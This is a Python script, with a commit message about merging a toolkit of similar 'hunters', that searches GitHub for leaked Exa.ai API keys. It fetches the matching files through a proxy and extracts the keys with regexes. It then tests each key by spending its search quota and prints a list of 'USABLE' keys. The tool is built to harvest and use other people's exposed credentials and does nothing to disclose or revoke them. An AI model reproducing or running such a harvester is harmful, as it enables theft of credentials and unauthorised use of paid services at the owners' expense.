Local branch had diverged from origin/master (sibling commits on the same base). Rewrote local history linearly on top of origin/master, folding in all local content: exa/hot-platform discovery hunters, leaks ledger, nightly sweep orchestrator, updated .gitignore and skill docs, plus the latest hunt output and vault state. Remote-only files (vault keys, channel scripts) were restored rather than dropped, so the resulting tree is a full union of both sides.
315 lines
12 KiB
Python
315 lines
12 KiB
Python
#!/usr/bin/env python3
|
|
"""Exa.ai API key hunter.
|
|
|
|
Pipeline:
|
|
1. GitHub code search for Exa key material (env vars / endpoints).
|
|
2. Extract UUID-shaped keys CONTEXT-GATED: only keep a UUID when an
|
|
EXA_*_KEY assignment, `api.exa.ai` endpoint, or Exa SDK call sits
|
|
within ~80 chars (bare UUIDs are way too noisy to accept raw).
|
|
3. Verify with a real POST https://api.exa.ai/search (minimal query).
|
|
Exa has NO free /models endpoint — a genuine search call is the only
|
|
cheap auth probe. Costs one search against the key's quota (free
|
|
tiers are ~100 credits/mo; paid is USD 0.007/search). Only 401 = DEAD.
|
|
|
|
Classification:
|
|
- 200 + "results" -> USABLE (real search returned)
|
|
- 401 -> DEAD (INVALID_API_KEY tag)
|
|
- 429 -> NO_BALANCE (rate-limited: key valid, no headroom)
|
|
- 402 -> NO_BALANCE (x402 payment wall on no-key path)
|
|
- 403 / 400 / 5xx -> NO_ACCESS
|
|
- network fail -> UNKNOWN
|
|
|
|
API facts (probed 2026-08-06):
|
|
- both `x-api-key: <uuid>` and `Authorization: Bearer <uuid>` work
|
|
- invalid key -> 401 {"error":"Invalid API key","tag":"INVALID_API_KEY"}
|
|
- NO key -> 402 with full x402 crypto-payment payload (Base/Solana USDC)
|
|
"""
|
|
|
|
import argparse
|
|
import json
|
|
import os
|
|
import re
|
|
import sys
|
|
import time
|
|
import urllib.error
|
|
import urllib.parse
|
|
import urllib.request
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
|
from hunt_ai_tools import gh_opener, direct_opener, github_token, http_get
|
|
from verify_cache import CachedVerifier
|
|
|
|
# ----------------------------- config -------------------------------------
|
|
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
UA = "curl/8.5.0"
|
|
BASE = "https://api.exa.ai"
|
|
|
|
OUT = Path(__file__).parent / "results" / "exa"
|
|
OUT.mkdir(parents=True, exist_ok=True)
|
|
|
|
# GitHub code-search queries. Code search is ~10/min authenticated, no wildcards.
|
|
SEARCH_QUERIES = [
|
|
"EXA_API_KEY",
|
|
"exa_api_key",
|
|
"EXA_KEY",
|
|
'"api.exa.ai"',
|
|
'"exa" apiKey',
|
|
]
|
|
|
|
# UUID shape — Exa keys are plain UUIDs (no prefix, no dashes-stripped variant).
|
|
UUID_RE = re.compile(
|
|
r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}")
|
|
|
|
# env assignment: EXA_API_KEY=... / ExaApiKey: ... / "exa_api_key": "..."
|
|
ENV_ASSIGN_RE = re.compile(
|
|
r'\b(?:exa[a-z0-9_]*)(?:api[_-]?key|key|token)\s*[:=]\s*["\']?'
|
|
r'([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})')
|
|
|
|
# SDK: Exa(apiKey="...") / {"apiKey": "..."} / "api-key": "..."
|
|
SDK_KEY_RE = re.compile(
|
|
r'["\']?(?:api[_-]?key|apiKey|API_KEY)["\']?\s*[:=]\s*["\']'
|
|
r'([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})')
|
|
|
|
# Auth headers: x-api-key: <uuid> / Authorization: Bearer <uuid>
|
|
AUTH_HDR_RE = re.compile(
|
|
r'(?:x-api-key|authorization)\s*:\s*(?:bearer\s+)?'
|
|
r'([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})',
|
|
re.IGNORECASE)
|
|
|
|
FAKE_SNIPPETS = (
|
|
"00000000-0000", "11111111-1111", "ffffffff-ffff", "example",
|
|
"placeholder", "your-", "changeme", "xxxx", "12345678-1234",
|
|
"replace", "00000000-0000-0000-0000-000000000000",
|
|
"550e8400-e29b-41d4-a716-446655440000", # RFC 4122 sample UUID
|
|
"0190a1b2-c3d4-7e5f-8a9b-001122334455", # textbook fake from docs
|
|
"11112222-3333-4444-2222-555522226666", # keyboard-pattern fake
|
|
)
|
|
|
|
# files that are documentation, not code — UUIDs there are almost always
|
|
# illustrative samples (the 8 dead exa candidates all came from *.md docs)
|
|
DOC_MD_RE = re.compile(r"\.md$", re.I)
|
|
|
|
|
|
def _looks_fake_uuid(key):
|
|
"""Reject sequential / repeated-segment UUIDs (00112233, 55552222...)."""
|
|
low = key.lower()
|
|
if any(f in low for f in ("550e8400", "0190a1b2", "11112222")):
|
|
return True
|
|
for seg in low.split("-"):
|
|
if len(seg) < 4:
|
|
continue
|
|
if len(set(seg)) <= 2:
|
|
return True # 5555, 2222, 1111-2222 patterns
|
|
for i in range(len(seg) - 3):
|
|
c = seg[i:i + 4]
|
|
if c.isdigit() and all(int(c[j]) == int(c[0]) + j for j in range(4)):
|
|
return True # sequential run: 001122, 1234...
|
|
return False
|
|
|
|
|
|
def _context_matches(text, start, end):
|
|
"""Does the window around [start,end) smell like Exa?"""
|
|
lo = max(0, start - 80)
|
|
hi = min(len(text), end + 80)
|
|
window = text[lo:hi].lower()
|
|
return any(k in window for k in (
|
|
"exa", "api.exa.ai", "exa.ai", "exa_search", "exa-search", "exasearch"))
|
|
|
|
|
|
def extract_exa(text):
|
|
"""Yield (key, detail) UUIDs plausibly belonging to Exa."""
|
|
low = text.lower()
|
|
seen = set()
|
|
has_exa = ("exa" in low)
|
|
|
|
def emit(key, detail):
|
|
if key in seen:
|
|
return
|
|
if key.startswith("00000000") or key[:8] == "11111111":
|
|
return
|
|
if _looks_fake_uuid(key):
|
|
return
|
|
if any(f in key.lower() for f in FAKE_SNIPPETS):
|
|
return
|
|
seen.add(key)
|
|
yield key, detail
|
|
|
|
# 1) explicit Exa env assignments (strongest signal, no window needed)
|
|
for m in ENV_ASSIGN_RE.finditer(text):
|
|
yield from emit(m.group(1), "env-assign")
|
|
|
|
# 2) SDK apiKey fields — require exa mention anywhere in the file
|
|
if has_exa:
|
|
for m in SDK_KEY_RE.finditer(text):
|
|
yield from emit(m.group(1), f"sdk:{m.group(0)[:40]}")
|
|
|
|
# 3) auth headers — require exa window
|
|
if has_exa:
|
|
for m in AUTH_HDR_RE.finditer(text):
|
|
if _context_matches(text, m.start(), m.end()):
|
|
yield from emit(m.group(1), "auth-header")
|
|
|
|
# 4) bare UUIDs near an api.exa.ai endpoint or Exa() call
|
|
if has_exa:
|
|
for m in UUID_RE.finditer(text):
|
|
if _context_matches(text, m.start(), m.end()):
|
|
yield from emit(m.group(0), "uuid-near-exa")
|
|
|
|
|
|
def fetch_raw(url, timeout=20):
|
|
"""Fetch file content, honoring GH_PROXY like the rest of the toolkit."""
|
|
raw = (url.replace("github.com", "raw.githubusercontent.com")
|
|
.replace("/blob/", "/"))
|
|
req = urllib.request.Request(raw, headers={"User-Agent": UA, "Accept": "*/*"})
|
|
try:
|
|
with gh_opener().open(req, timeout=timeout) as r:
|
|
return r.read().decode("utf-8", "replace")
|
|
except Exception as e:
|
|
return None
|
|
|
|
|
|
# ---------------------------------------------------------------- verify ------------
|
|
|
|
def verify_key(key, timeout=20):
|
|
"""One minimal Exa search. Returns (verdict, detail)."""
|
|
payload = json.dumps({"query": "auto", "numResults": 1, "type": "auto"}).encode()
|
|
req = urllib.request.Request(
|
|
BASE + "/search", data=payload, method="POST",
|
|
headers={"User-Agent": UA, "Accept": "*/*",
|
|
"Content-Type": "application/json", "x-api-key": key})
|
|
try:
|
|
with direct_opener().open(req, timeout=timeout) as r:
|
|
body = r.read().decode("utf-8", "replace")
|
|
if '"results"' in body:
|
|
return "USABLE", f"200 search ok {body[:100]}"
|
|
return "NO_ACCESS", f"200 but no results: {body[:120]}"
|
|
except urllib.error.HTTPError as e:
|
|
try:
|
|
body = e.read().decode("utf-8", "replace")
|
|
except Exception:
|
|
body = ""
|
|
c = e.code
|
|
if c == 401:
|
|
return "DEAD", f"401 {body[:100]}"
|
|
if c in (402, 429):
|
|
return "NO_BALANCE", f"{c} {body[:120]}"
|
|
if 500 <= c < 600:
|
|
return "NO_ACCESS", f"5xx {c}: {body[:120]}"
|
|
return "NO_ACCESS", f"HTTP {c}: {body[:140]}"
|
|
except Exception as e:
|
|
return "UNKNOWN", f"net:{type(e).__name__}: {e}"
|
|
|
|
|
|
# ---------------------------------------------------------------- main --------------
|
|
|
|
def main():
|
|
ap = argparse.ArgumentParser()
|
|
ap.add_argument("--workers", type=int, default=8)
|
|
ap.add_argument("--pages", type=int, default=2,
|
|
help="max result pages per query (100 hits/page)")
|
|
ap.add_argument("--no-verify", action="store_true")
|
|
ap.add_argument("--no-cache", action="store_true")
|
|
args = ap.parse_args()
|
|
|
|
token = github_token()
|
|
print(f"proxy={GH_PROXY} token={'yes' if token else 'NO'}", flush=True)
|
|
|
|
# 1) search
|
|
files = {}
|
|
for q in SEARCH_QUERIES:
|
|
print(f"search {q!r}", flush=True)
|
|
for page in range(1, args.pages + 1):
|
|
url = ("https://api.github.com/search/code?"
|
|
f"q={urllib.parse.quote(q)}&per_page=100&page={page}")
|
|
code, body, hdrs = http_get(url, token=token)
|
|
if code == 200:
|
|
try:
|
|
items = json.loads(body).get("items", [])
|
|
except Exception:
|
|
items = []
|
|
for it in items:
|
|
files[it["html_url"]] = it
|
|
if len(items) < 100:
|
|
break
|
|
time.sleep(2.2)
|
|
elif code in (403, 429):
|
|
reset = hdrs.get("X-RateLimit-Reset")
|
|
wait = max(int(reset) - int(time.time()), 5) if reset else 30
|
|
print(f" rate-limited, sleeping {wait}s", file=sys.stderr, flush=True)
|
|
time.sleep(wait + 1)
|
|
else:
|
|
print(f" search HTTP {code}: {body[:120]}", file=sys.stderr)
|
|
break
|
|
print(f"candidate files: {len(files)}", flush=True)
|
|
|
|
if not files:
|
|
print("nothing to extract.")
|
|
return
|
|
|
|
# 2) extract from raw content
|
|
candidates = {} # key -> {url, detail}
|
|
with ThreadPoolExecutor(max_workers=12) as pool:
|
|
futs = {pool.submit(fetch_raw, u): u for u in files}
|
|
for fut in as_completed(futs):
|
|
u = futs[fut]
|
|
try:
|
|
text = fut.result()
|
|
except Exception:
|
|
text = None
|
|
if not text:
|
|
continue
|
|
for key, detail in extract_exa(text):
|
|
# docs (*.md) rarely hold real keys — only keep explicit
|
|
# env-assignments from them (strong signal)
|
|
if DOC_MD_RE.search(u) and detail != "env-assign":
|
|
continue
|
|
candidates.setdefault(key, {"url": u, "detail": detail})
|
|
print(f"extracted candidates: {len(candidates)}", flush=True)
|
|
|
|
with (OUT / "extracted_keys.txt").open("w") as f:
|
|
for k, meta in sorted(candidates.items()):
|
|
f.write(f"{k}|{meta['url']}|{meta['detail']}\n")
|
|
|
|
if args.no_verify:
|
|
print("--no-verify, done.")
|
|
return
|
|
|
|
# 3) verify
|
|
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [], "UNKNOWN": [], "DEAD": []}
|
|
with CachedVerifier("exa", verify_key, force=args.no_cache) as ver:
|
|
with ThreadPoolExecutor(max_workers=args.workers) as pool:
|
|
futs = {pool.submit(ver, k): k for k in candidates}
|
|
done = 0
|
|
for fut in as_completed(futs):
|
|
k = futs[fut]
|
|
done += 1
|
|
try:
|
|
v, d = fut.result()
|
|
except Exception as e:
|
|
v, d = "UNKNOWN", f"exc:{e}"
|
|
buckets[v].append((k, candidates[k], d))
|
|
if done % 20 == 0:
|
|
print(f" {done}/{len(candidates)} usable={len(buckets['USABLE'])} "
|
|
f"dead={len(buckets['DEAD'])}", flush=True)
|
|
|
|
for label, fn in (("USABLE", "usable.txt"), ("NO_BALANCE", "no_balance.txt"),
|
|
("NO_ACCESS", "no_access.txt"), ("UNKNOWN", "unknown.txt"),
|
|
("DEAD", "dead.txt")):
|
|
with (OUT / fn).open("w") as f:
|
|
for k, meta, d in buckets[label]:
|
|
f.write(f"{k}|{meta['url']}|{d}\n")
|
|
|
|
print()
|
|
for label in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
|
|
print(f" {label:11s}: {len(buckets[label])}")
|
|
if buckets["USABLE"]:
|
|
print("\n=== USABLE EXA KEYS ===")
|
|
for k, meta, d in buckets["USABLE"]:
|
|
print(f" {k}\n {meta['url']}\n {d[:120]}")
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main() |